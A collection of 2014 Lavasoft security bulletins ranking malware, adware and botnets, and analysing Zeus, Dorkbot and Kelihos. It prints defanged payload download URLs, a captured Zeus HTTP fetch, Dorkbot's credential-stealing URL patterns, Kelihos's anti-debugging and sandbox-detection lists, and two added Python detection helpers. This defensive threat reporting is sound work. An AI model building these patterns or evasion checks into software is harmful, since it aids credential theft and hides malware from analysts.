Lavasoft Security Bulletin - April 2014: Top Threats

Top 20 Blocked Malware

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Win32.Trojan.Agent | 74.59% | -6.72%
2 | Trojan.Win32.Generic!BT | 14.68% | +5.79%
3 | Jeefo | 0.76% | +0.54%
4 | Trojan.Win32.Generic.pak!cobra | 0.70% | +0.19%
5 | Virus.Win32.Ramnit.a | 0.67% | new
6 | Malware.JS.Generic | 0.66% | +0.13%
7 | HackTool.Win32.Keygen | 0.60% | +0.32%
8 | Worm.LNK.Jenxcus.aha | 0.57% | -0.26%
9 | Win32.TrojanDropper.Agent/A | 0.45% | new
10 | Virus.Win32.Sality.at | 0.41% | +0.07%
11 | Trojan.Win32.Jpgiframe | 0.32% | +0.11%
12 | Trojan.Win32.Generic!SB.0 | 0.31% | +0.15%
13 | Virus.Win32.Sality.ah | 0.23% | new
14 | Trojan-Clicker.HTML.RemoteScript | 0.23% | new
15 | Trojan-Dropper.Win32.Agent.aeu | 0.15% | new
16 | Virus.Win32.Expiro.i | 0.13% | new
17 | Trojan.Win32.Ramnit.c | 0.12% | -0.22%
18 | Trojan.Win32.AutoIT.gen | 0.11% | new
19 | Trojan.Win32.Packer.PESpinv1.32 | 0.10% | new
20 | Backdoor.Win32.Bifrose.fsi | 0.09% | new

The Top 20 malicious programs blocked on PCs

Malware Prevalence Table - April 2014

The table below ranks the most prevalent families seen in April.

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Trojan.Win32.Generic!BT | 33.87% | +0.41%
2 | Virus.Win32.Expiro.gen | 7.52% | +0.17%
3 | Virus.Win32.Virut.ce | 6.71% | +3.41%
4 | Trojan-Downloader.Win32.LoadMoney.u | 5.16% | -0.85%
5 | Trojan.Win32.Generic.pak!cobra | 3.01% | -0.10%
6 | Trojan.Win32.Ircbot!cobra | 0.86% | -0.18%
7 | InstallCore | 0.82% | new
8 | Trojan.Win32.Generic!SB.0 | 0.77% | +0.41%
9 | Adware.Bettersurf | 0.77% | new
10 | Adware.OutBrowse | 0.58% | -0.06%
11 | Optimum Installer | 0.53% | new
12 | Click run software | 0.47% | new
13 | Trojan.Win32.DelfInject.m | 0.36% | -0.07%
14 | Trojan.Win32.LoadMoney.f | 0.34% | +0.02%
15 | Trojan.StartPage | 0.22% | new
16 | FraudTool.Win32.InternetProtection.ek!a | 0.21% | -0.05%
17 | Worm.Win32.Gamarue.z | 0.21% | +0.02%
18 | Trojan.HTML.Ransomware.b | 0.20% | -0.05%
19 | Backdoor.MSIL.Bladabindi.a | 0.20% | +0.02%
20 | Malware.JS.Generic | 0.20% | new

New malicious programs entered the Top 20

In April the Lavasoft Malware Analysis System detected the following fake antiviruses. This polymorphic Fake AV family was previously described in February 2014.

Fake AV (MD5: 9e42968882b42a4f4418df8bb5301f65, 36f0e8ae4f8e14b35757136cc2200952, 78912dc0c6406105343ead0656b74f8a, aa1c742eafac0c819c3fb32f325c3be3, c3e6595842fd0366d87790c814b28af2, d6cb2f4d4f2b1db9087ed0f081cca1c5, d12bc79b2d8714fe80600730bc200138, df7721c0e49fdd1f14b43b1d3c6d3424)

Top20 Potentially Unwanted Programs

Below are the Top 20 Potentially Unwanted Programs blocked by Ad-Aware on users' PCs. These are advertising software, browser toolbars, search engines and other programs that change browser start pages and other system settings.

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | MyWebSearch | 17.07% | +1.19%
2 | Conduit | 16.82% | -6.21%
3 | Win32.PUP.Bandoo | 14.34% | +6.93%
4 | Adware.Linkury | 9.21% | +2.32%
5 | Adware.JS.Conduit | 9.19% | -0.99%
6 | Adware.SaveSense | 2.52% | -1.33%
7 | Crossrider | 1.96% | -0.23%
8 | Win32.Toolbar.Iminent | 1.72% | -0.17%
9 | Adware.Win32.Multiplug.c | 1.38% | new
10 | DomaIQ | 1.23% | +0.09%
11 | Adware.Agent | 1.12% | -0.24%
12 | Iminent | 1.08% | -0.81%
13 | Adware.DealPly | 1.01% | -0.14%
14 | SweetIM | 0.95% | -0.11%
15 | InstallCore | 0.82% | -0.08%
16 | Opencandy | 0.80% | -0.20%
17 | Win32.Adware.Agent | 0.75% | -0.61%
18 | Yontoo | 0.70% | new
19 | InstallCore.b | 0.69% | +0.10%
20 | Montiera | 0.64% | -0.03%

Top 20 PUPs detected on users' PCs

Operating Systems

Infections by OS

Geographic Location

Infections by country of origin

We will keep monitoring the global malware situation and will inform our readers about new malicious code samples in the next Lavasoft Security Bulletin.

Read also:
Lavasoft Security Bulletin - April 2014: Bot Review.

Zeus Downloader Comes as GoogleUpdate.


Lavasoft Security Bulletin - April 2014: Bot Review

Bot Review

Table: Bots under analysis (April 2014, Lavasoft MAS).


Bot's name | March 2014 | April 2014 | Changes
Zbot | 65 | 568 | 62.3%
Cycbot | 29 | 10 | -2.4%
Kelihos | 66 | 68 | 0.2%
NrgBot/Dorkbot | 74 | 149 | 9.3%
Blazebot/Rbot | 13 | 5 | -1.0%
Shiz | 4 | 7 | 0.4%
Total | 620 | 635 |

Bot distribution in April:

Kelihos. You can find the latest Kelihos description here.

Cycbot. You can find the latest Cycbot description here.

Shiz. The latest description is here.

Zbot. We saw a significant increase in Zeus bots, from 65 analyzed samples in March up to 568 in April. Read more about a Zeus variant found in April here.

NrgBot/Dorkbot. The number of Dorkbots has doubled since March. You can find the latest description here.

Blazebot/Rbot. The latest description is available in Malware Encyclopedia.

Read also:
Zeus Downloader Comes as GoogleUpdate.

Lavasoft Security Bulletin - April 2014: Top Threats.

Lavasoft Security Bulletin - May 2014: Top Threats

Top20 Blocked Malware

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Win32.Trojan.Agent | 66.35% | -8.24%
2 | Trojan.Win32.Generic!BT | 20.66% | +5.98%
3 | Exploit.PDF.Pdfjs.aei | 2.84% | new
4 | Virus.Win32.Ramnit.a | 1.46% | +0.79%
5 | Worm.LNK.Jenxcus.aha | 0.66% | +0.09%
6 | Malware.JS.Generic | 0.54% | -0.12%
7 | Trojan.Win32.Ramnit.c | 0.50% | +0.38%
8 | Trojan.Win32.Generic.pak!cobra | 0.42% | -0.28%
9 | Trojan.Win32.Generic!SB.0 | 0.35% | +0.04%
10 | Virus.Win32.Ramnit.b | 0.33% | new
11 | HackTool.Win32.Keygen | 0.33% | -0.27%
12 | Virus.Win32.Sality.at | 0.32% | -0.09%
13 | Email-Worm.Win32.Brontok.a | 0.26% | new
14 | Virus.Win32.Sality.ek | 0.24% | new
15 | Trojan.Win32.Jpgiframe | 0.22% | -0.10%
16 | Virus.Win32.Virut.ce | 0.21% | new
17 | FraudTool.Win32.FakeVimes!VB | 0.20% | new
18 | Trojan-Clicker.HTML.Iframe | 0.19% | new
19 | Win32.Worm.Autorun/A | 0.18% | new
20 | Virus.Win32.Expiro.cn | 0.16% | new

The Top 20 malicious programs blocked on PCs

Malware Prevalence Table - May 2014

The table below ranks the most prevalent families seen in May.

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Trojan.Win32.Generic!BT | 33.79% | -0.08%
2 | Virus.Win32.Virut.ce | 6.72% | +0.01%
3 | Virus.Win32.Expiro.gen | 5.82% | -1.70%
4 | Trojan-Downloader.Win32.LoadMoney.u | 4.59% | -0.57%
5 | Trojan.Win32.Generic.pak!cobra | 2.81% | -0.20%
6 | InstallCore | 1.75% | +0.93%
7 | Trojan.Win32.Generic!SB.0 | 0.83% | +0.06%
8 | Trojan.Win32.LoadMoney.f | 0.78% | +0.44%
9 | Trojan.Win32.Ircbot!cobra | 0.73% | -0.13%
10 | Worm.Win32.Picsys.c | 0.49% | new
11 | Adware.OutBrowse | 0.49% | -0.09%
12 | Optimum Installer | 0.48% | -0.05%
13 | Conduit | 0.48% | new
14 | Click run software | 0.40% | -0.07%
15 | Vittalia Installer | 0.39% | new
16 | Trojan.Win32.DelfInject.m | 0.31% | -0.05%
17 | Trojan.StartPage | 0.27% | +0.05%
18 | Worm.Win32.Gamarue.z | 0.25% | +0.04%
19 | Backdoor.MSIL.Bladabindi.a | 0.23% | +0.03%
20 | FraudTool.Win32.InternetProtection.ek!a | 0.18% | -0.03%

New malicious programs entered the Top 20

This month we discovered several new Fake AVs with GUIs similar to the ones below. One of them, "Open Cloud AV", even borrows the cloud security concept.

Fake AV (MD5: 1c01c7a1c0d18c376d295522f096a5cb) is detected by Ad-Aware as Gen:Variant.Kazy.73805

Fake AV (MD5: 5deeff05129a1d4aaf5bac9091d9058f) is detected by Ad-Aware as Trojan.Generic.KD.369558

Fake AV (MD5: 6882c02d396d287ddfb3717bb717bead) is detected by Ad-Aware as Trojan.FakeAlert.CYD

Top20 Potentially Unwanted Programs

Below are the Top 20 Potentially Unwanted Programs blocked by Ad-Aware on users' PCs. These are advertising software, browser toolbars, search engines and other programs that change browser start pages and other system settings.

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Conduit | 19.38% | +2.56%
2 | MyWebSearch | 15.30% | -1.77%
3 | Win32.PUP.Bandoo | 12.33% | -2.01%
4 | Adware.JS.Conduit | 8.31% | -0.88%
5 | Adware.Linkury | 7.36% | -1.85%
6 | Yontoo | 3.41% | +2.71%
7 | Crossrider | 2.25% | +0.29%
8 | Montiera | 1.68% | +1.04%
9 | Adware.SaveSense | 1.61% | -0.91%
10 | Win32.Toolbar.Iminent | 1.56% | -0.16%
11 | DomaIQ | 1.34% | +0.11%
12 | Adware.Win32.Multiplug.c | 1.32% | -0.06%
13 | BetterInstaller | 1.10% | new
14 | Win32.Adware.Agent | 1.07% | +0.32%
15 | Iminent | 0.99% | -0.73%
16 | SweetIM | 0.82% | -0.13%
17 | Opencandy | 0.78% | -0.02%
18 | Adware.DealPly | 0.77% | -0.24%
19 | InstallCore.b | 0.76% | +0.07%
20 | InstallCore | 0.75% | -0.07%

Top 20 PUPs detected on users' PCs

Operating Systems

Infections by OS

Geographic Location

Infections by country of origin

We will keep monitoring the global malware situation and will inform our readers about new malicious code samples in the next Lavasoft Security Bulletin.

Read also:
Lavasoft Security Bulletin - May 2014: Bot Review.
Kelihos Adopts Anti-Analysis Technique.

Lavasoft Security Bulletin - May 2014: Bot Review

Bot Review

Table: Bots under analysis (May 2014, Lavasoft MAS).


Bot's name | April 2014 | May 2014 | Changes
Zbot | 568 | 149 | -51.3%
Cycbot | 10 | 19 | 1.1%
Kelihos | 68 | 472 | 49.4%
NrgBot/Dorkbot | 149 | 169 | 2.4%
Blazebot/Rbot | 5 | 2 | -0.4%
Shiz | 7 | 6 | -0.1%
Total | 807 | 818 |

Bot distribution in May:

Kelihos. This month we see a significant increase in Kelihos backdoors discovered in the Lab: 58% in May against 8% in April. You can read more about the adoption of anti-analysis techniques by the Kelihos bot here.

Cycbot. You can find the latest Cycbot description here.

Shiz. The latest description is here.

Zbot. Read more about the Zeus variant found in May in the Malware Encyclopedia. 30% of all detected Zeus samples use a Tor client.

Zeus continues to download its files in encrypted form:

URL | IP
hxxp://highclassdelhiescorts.in/images/css/al0302.enc | 103.8.127.189
hxxp://manjena.com/images/al0302.enc | 184.107.194.106

This time the Canadian server replied with a ZZP-encrypted file (329 288 bytes in size):

GET /images/al0302.enc HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: manjena.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Sat, 24 May 2014 06:00:28 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.6
Last-Modified: Mon, 03 Feb 2014 15:36:31 GMT
ETag: "a548037-50648-4f18249ad9dc0"
Accept-Ranges: bytes
Content-Length: 329288
Connection: close
Content-Type: text/plain

ZZP..~.:.T.tS...W.......S..vS..OJ.)w_..w....Z...S...r... ...!...2..W0.
..<..w1...&...S..3....<D..}..}w.GwWF:..'T....X..3 Q..3...pl6.wT.
..U6.upP.x|.TM...p[6..S...0..HFo.w...;R..P[. %V.!wP..|R..w;.....C~...u
CD..V..d...wS..1R...P..qQ^".2..x....FB.qP..w.m.w{..q..usr..o.H...G@.F.

<<< skipped >>>

After decryption with the Zeus decryption tool (ZeusDecryptor) we obtained the usual randomly named application (MD5: f1f03b73b6c32ef28514d740073a4941, 386 560 bytes in size):

%Documents and Settings%\%current user%\Application Data\Idaz\ecyche.exe

The downloader also copies itself as "pdfupdate.exe" (MD5: 0a2947abe4c9e6d539066993690c8a38, 19 224 bytes in size) to the %Temp% folder and executes it.
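As an added example (not part of the bulletin), the following Python check scans a captured request/response pair for the traits of the Zeus download exchange shown above: the "Updates downloader" User-Agent, a .enc path, and a ZZP-prefixed body served as text/plain. The sample messages are constructed to mirror the capture; their body bytes are placeholders, not the real file.

```python
# Constructed request/response pair modelled on the capture above: same
# method, path, User-Agent and Content-Type; the body bytes are placeholders.
SAMPLE_REQUEST = (
    b"GET /images/al0302.enc HTTP/1.1\r\n"
    b"Accept: text/*, application/*\r\n"
    b"User-Agent: Updates downloader\r\n"
    b"Host: manjena.com\r\n"
    b"Cache-Control: no-cache\r\n\r\n"
)
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/plain\r\n"
    b"Content-Length: 24\r\n"
    b"Connection: close\r\n\r\n"
    + b"ZZP" + bytes(range(21))  # 24 bytes of stand-in ciphertext
)


def parse_http(raw):
    """Split a raw HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def zeus_download_indicators(request, response):
    """Return a tag for every Zeus-downloader trait found in the pair."""
    tags = []
    request_line, req_hdrs, _ = parse_http(request)
    _, resp_hdrs, body = parse_http(response)
    parts = request_line.split()
    path = parts[1] if len(parts) > 1 else ""
    if req_hdrs.get("user-agent") == "Updates downloader":
        tags.append("ua-updates-downloader")
    if path.lower().endswith(".enc"):
        tags.append("enc-path")
    if body.startswith(b"ZZP"):
        tags.append("zzp-magic")
        if resp_hdrs.get("content-type", "").startswith("text/plain"):
            tags.append("zzp-as-text-plain")  # binary blob labelled as text
    declared = resp_hdrs.get("content-length", "")
    if declared.isdigit() and int(declared) != len(body):
        tags.append("length-mismatch")  # truncated or padded capture
    return tags
```

Any single tag is weak on its own (a .enc path is not malicious by itself); the combination of the custom User-Agent with a ZZP body is the part worth alerting on.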

NrgBot/Dorkbot. The number of Dorkbots has continued to grow since March. You can find the latest description here.

Currently the backdoor uses the following wildcard expressions to steal logins and passwords for popular services:

iknowthatgirl*/members*, *youporn.*/login*, *members.brazzers.com*, *bcointernacional*login*, *:2222/CMD_LOGIN*, *whcms*dologin* , *:2086/login*, *:2083/login*, *:2082/login*, *webnames.ru/*user_login*, Webnames, *dotster.com/*login*, loginid, *enom.com/login*, login.Pass, login.User, *login.Pass=*, *1and1.com/xml/config*, *moniker.com/*Login*, LoginPassword, LoginUserName, *LoginPassword=*, *namecheap.com/*login*, loginname, *godaddy.com/login*, Password, *Password=*, *alertpay.com/login*, *netflix.com/*ogin*, *thepiratebay.org/login*, *torrentleech.org/*login*, *vip-file.com/*/signin-do*, *sms4file.com/*/signin-do*, *letitbit.net*, *what.cd/login*, *oron.com/login*, *filesonic.com/*login*, *speedyshare.com/login*, *uploaded.to/*login*, *uploading.com/*login*, loginUserPassword, loginUserName, *loginUserPassword=*, *fileserv.com/login*, *hotfile.com/login*, *4shared.com/login*, txtpass, *txtpass=*, *netload.in/index*, *freakshare.com/login*, login_pass, *login_pass=*, *mediafire.com/*login*, *sendspace.com/login*, *megaupload.*/*login*, *depositfiles.*/*/login*, *signin.ebay*SignIn, *officebanking.cl/*login.asp*, *secure.logmein.*/*logincheck*, session[password], *password]=*, *twitter.com/sessions, txtPassword, *&txtPassword=*, *.moneybookers.*/*login.pl, *runescape*/*weblogin*, *&password=*, *no-ip*/login*, *steampowered*/login*, quick_password, *hackforums.*/member.php, *facebook.*/login.php*, *login.yahoo.*/*login*, passwd, login, *passwd=*, *login.live.*/*post.srf*, TextfieldPassword, *TextfieldPassword=*, *gmx.*/*FormLogin*, *Passwd=*, FLN-Password, *FLN-Password=*, *pass=*, *bigstring.*/*index.php*, *screenname.aol.*/login.psp*, password, loginId, *password=*, *aol.*/*login.psp*, Passwd, *google.*/*ServiceLoginAuth*, login_password, login_email, *login_password=*, *paypal.*/webscr?cmd=_login-submit*, *bebo.*/c/profile/comment_post.json, *bebo.*/mail/MailCompose.jsp*, *friendster.*/sendmessage.php*, *friendster.*/rpc.php, *vkontakte.ru/mail.php, 
*vkontakte.ru/wall.php, *vkontakte.ru/api.php, *facebook.*/ajax/*MessageComposerEndpoint.php*, msg_text, *facebook.*/ajax/chat/send.php*

We see the following online services attacked in the list above:

iknowthatgirl.com, youporn.com, brazzers.com, bancointernacional.com.ec, webnames.ru, dotster.com, enom.com, 1and1.com, moniker.com, namecheap.com, godaddy.com, alertpay.com, netflix.com, thepiratebay.org, torrentleech.org, vip-file.com, sms4file.com, letitbit.net, what.cd, oron.com, filesonic.com, speedyshare.com, uploaded.to, uploading.com, fileserv.com, hotfile.com, 4shared.com, netload.in, freakshare.com, mediafire.com, sendspace.com, megaupload.com, depositfiles.com, ebay.com, officebanking.cl, logmein.com, twitter.com, moneybookers.com, runescape.com, hackforums.com, facebook.com, yahoo.com, live.com, gmx.com, aol.com, google.com, paypal.com, bebo.com, friendster.com, vkontakte.ru, facebook.com

The list includes adult websites, domain registrars, online banking services, file sharing services, online games, and popular social networks.
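The list above mixes URL patterns, POST-body fragments and bare form-field names. As an added example (not the bulletin's own tooling), this Python helper separates the three kinds, extracts the targeted hosts as the bulletin does by hand, and tests captured proxy-log URLs against the URL patterns; it assumes the bot's "*" is a plain glob wildcard and uses a constructed subset of the expressions.

```python
import re

# Constructed subset of the Dorkbot expression list quoted above; the full
# list from the bulletin can be pasted in verbatim.
DORKBOT_EXPRESSIONS = [
    "*godaddy.com/login*", "*netflix.com/*ogin*", "*:2083/login*",
    "*paypal.*/webscr?cmd=_login-submit*", "*login.live.*/*post.srf*",
    "*facebook.*/login.php*", "*vkontakte.ru/mail.php",
    "password", "*password=*", "login_email", "*login_password=*",
]


def classify(expr):
    """The bot's list mixes three kinds of entry: URL patterns (contain '/'),
    POST-body fragments ('name=*') and bare form-field names."""
    if "/" in expr:
        return "url"
    if expr.endswith("=*"):
        return "body"
    return "field"


def targeted_hosts(exprs):
    """Host part of every URL pattern, as the bulletin lists them by hand.
    Port-only patterns such as '*:2083/login*' (cPanel) name no host."""
    hosts = set()
    for expr in exprs:
        if classify(expr) != "url":
            continue
        host = expr.lstrip("*").split("/", 1)[0]
        if not host.startswith(":"):
            hosts.add(host)
    return sorted(hosts)


def to_regex(expr):
    """Assumed glob semantics: '*' matches any run of characters; everything
    else, including '?' and '.', is literal."""
    return re.compile(".*".join(re.escape(part) for part in expr.split("*")))


def matching_patterns(url, exprs):
    """URL patterns from the list that would fire on a captured request URL,
    e.g. one taken from a proxy log."""
    return [e for e in exprs if classify(e) == "url" and to_regex(e).search(url)]
```

Running proxy-log URLs through matching_patterns shows which of an organisation's logins a Dorkbot infection would have harvested, which is the list of credentials to rotate.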

Blazebot/Rbot. The latest description is available in Malware Encyclopedia.

Read also:
Lavasoft Security Bulletin - May 2014: Top Threats.
Kelihos Adopts Anti-Analysis Technique.

Kelihos Adopts Anti-Analysis Technique

Since the end of April we have observed that Kelihos has adopted anti-analysis functionality. The backdoor checks for the following running processes, which belong to malware analysis tools (network sniffers, debuggers, screen recorders), virtualization platforms (VirtualBox) and sandboxes (Sandboxie):

cv.exe
irise.exe
IrisSvc.exe
wireshark.exe
dumpcap.exe
ZxSniffer.exe
Aircrack-ng Gui.exe
observer.exe
tcpdump.exe
WinDump.exe
wspass.exe
Regshot.exe
ollydbg.exe
PEBrowseDbg.exe
windbg.exe
DrvLoader.exe
SymRecv.exe
Syser.exe
apis32.exe
VBoxService.exe
VBoxTray.exe
SbieSvc.exe
SbieCtrl.exe
SandboxieRpcSs.exe
SandboxieDcomLaunch.exe
SUPERAntiSpyware.exe
ERUNT.exe
ERDNT.exe
EtherD.exe
Sniffer.exe
CamtasiaStudio.exe
CamRecorder.exe
vba32arkit.exe

The same check is performed for the following registry keys:

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Wireshark
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\wireshark.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Win Sniffer_is1
SOFTWARE\Classes\PEBrowseDotNETProfiler.DotNETProfiler
Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\Debugging Tools for Windows (x86)
SYSTEM\CurrentControlSet\Services\SDbgMsg
Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\APIS32
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\APIS32
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Oracle VM VirtualBox Guest Additions
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sandboxie
SOFTWARE\SUPERAntiSpyware.com
SOFTWARE\Classes\SUPERAntiSpywareContextMenuExt.SASCon.1
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ERUNT_is1

These lists appear to have been partly borrowed from the Simda backdoor.

Kelihos continues to prefer Ukrainian servers for downloading new updates (you can read more about the geographic distribution of the botnet in the past here):

URL | Country
hxxp://178.150.139.157/mod1/zlubob1.exe | (flag image not reproduced)
hxxp://5.105.69.96/mod2/zlubob1.exe | (flag image not reproduced)
hxxp://213.111.239.19/online.htm | (flag image not reproduced)
hxxp://194.44.49.98/mod1/zlubob1.exe | (flag image not reproduced)

The downloaded file "zlubob1.exe" is 612 352 bytes in size (MD5: b4f8a1e28e762567bcf3ade3405259df) and can provide a Remote Desktop connection to the attacker via the WTS (Windows Terminal Server) API, which appears in its import table.

Registry key enumeration and the search for password files are the reason for the high CPU load (99%):

As we wrote earlier in the blog, it searches for passwords stored in the configuration and cache files of the following FTP clients and web browsers:

WISE FTP, IE, Mozilla Firefox, Chrome, Chromium, Bromium, Nichrome, RockMelt, Comodo, ChromePlus, browser.yandex, LeechFTP, Odin, WinFTP, FTPGetter, Estsoft\ALFTP, Staff, Blaze, NetFile, GoFTP, 3D-FTP, EasyFTP, XFTP, BlazeFTP, SiteDesigner, Whisper Technology\FTP Surfer, VanDyke\SecureFX, Fling, NetDrive, FTP Explorer, FTPRush, UltraFXP, AceBIT, Flock\Browser, FTP-Now

We may conclude that the Kelihos botnet is growing again and already holds the biggest share of the botnet pie, 58% in May 2014. The bot carries the same credential-stealing payload, but it is now armored with anti-analysis functionality that will complicate reversing and debugging the backdoor.

Read also:
Lavasoft Security Bulletin - May 2014: Bot Review.

Lavasoft Security Bulletin - May 2014: Top Threats.

Lavasoft Security Bulletin - June 2014: Top Threats

Lavasoft Security Bulletin - June 2014: Bot Review

Beware of FIFA World Cup 2014 Scams

The FIFA World Cup 2014 in Brazil is being used as a lure for numerous tricks aimed to get your money or show you unsolicited advertisements.
Last month Symantec wrote about an email scam where the scammers offered free tickets for the World Cup.

Lavasoft Security Bulletin - July 2014: Top Threats

Lavasoft Security Bulletin - July 2014: Bot Review

Bundled Software: Good or Evil?

Lavasoft Security Bulletin - August 2014: Bot Review

Lavasoft Security Bulletin - August 2014: Top Threats

The PUP That Can Detect Anti-Malware Programs

In last month's Security Bulletin we talked about the issues surrounding bundled software and explained why AV companies often detect such programs as potentially unwanted programs, a.k.a. 'PUPs'.

This month we are going to walk through an interesting example of bundled software called Media Player by VideoBuzz (detected by Ad-Aware as Gen:Variant.Application.MediaFinder.2), which brings hidden surprises to the user.

Lavasoft Security Bulletin - September 2014: Top Threats


Lavasoft Security Bulletin - September 2014: Bot Review

PUPs with Rootkit

We discovered numerous cases of PUPs being installed with a rootkit component that protects their files, registry keys and processes on the system. The component is used to defend the PUP against removal by competing PUPs and by automated PUP removal tools.

We are going to consider two PUPs that utilize the same rootkit to protect their files and registry keys:

Lavasoft Security Bulletin - October 2014: Top Threats

Lavasoft Security Bulletin - October 2014: Bot Review

Potentially Unwanted Program Self-Protection Technologies
